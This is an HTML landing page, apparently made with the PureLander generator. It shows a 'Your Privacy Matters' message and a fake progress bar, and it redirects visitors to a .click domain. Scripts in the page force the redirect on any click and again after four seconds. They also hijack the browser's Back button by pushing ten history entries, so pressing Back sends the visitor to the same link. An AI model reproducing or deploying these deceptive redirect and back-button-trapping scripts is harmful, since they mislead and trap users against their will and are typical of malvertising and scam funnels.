<!-- 

This landing page has been generated using PureLander

########################################
#######						     #######
#######    www.purelander.com    #######
#######						     #######
########################################

PureLander : The best affordable landing page generator

-->
<html>
<head>
    <title>Title here</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
    <link rel="stylesheet" type="text/css" href="css/style.css">
</head>
<body onload="move()">
<div id="wrapper">
<div class="container">
<h3 class="loading"><span style="font-size: 24pt;"><br /><br /><br /><br /><br /><span style="font-size: 18pt;">Your Privacy Matters</span></span></h3>
<br />
<div id="progress_bar">
<div id="myProgress">
<div id="myBar" style="width: 5%;">5%</div>
</div>
</div>
<script>
            function move() {
                var elem = document.getElementById("myBar");
                var width = 10;
                var id = setInterval(frame, 50);
                function frame() {
                    if (width >= 100) {
                        clearInterval(id);
                    } else {
                        width++;
                        elem.style.width = width + '%';
                        elem.innerHTML = width * 1 + '%';
                    }
                }
            }
            </script>
</div>
<div class="container">
<div id="instruction">
<p><span style="font-size: 12pt;">&nbsp; &nbsp; &nbsp;We take privacy seriously, You will be redirected shortly</span></p>
<br />
<p><span style="font-size: 10pt;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<span style="color: #3366ff;">Learn More&nbsp; &nbsp;Help Center&nbsp; Privacy Policy&nbsp;</span></span></p>
</div>
</div>
</div>
<script type="text/javascript">
	document.body.addEventListener('click', function(){ window.location = 'https://boutiquebazaar.click/tmh2ce';}, false);
</script>
<script language="javascript">
	window.setTimeout(function(){
	    window.location.href = 'https://boutiquebazaar.click/tmh2ce';
	},4000);
</script>
<script type='text/javascript'>
        var back_ntb_link = 'https://boutiquebazaar.click/tmh2ce';
        if (typeof back_ntb_link !== 'undefined' && back_ntb_link !== null) {
            !(function() {
                var t;
                try {
                    const URL = window.location.href.split(/[#]/)[0];
                    for (t = 0; 10 > t; ++t) history.pushState({}, '', URL + '#');
                    onpopstate = function(event) {
                        event.state && location.replace(back_ntb_link);
                    };
                } catch (o) {
                    console.log(o);
                }
            })();
        }
</script>
</body>
<!-- This landing page has been Generated using purelander.com -->
</html>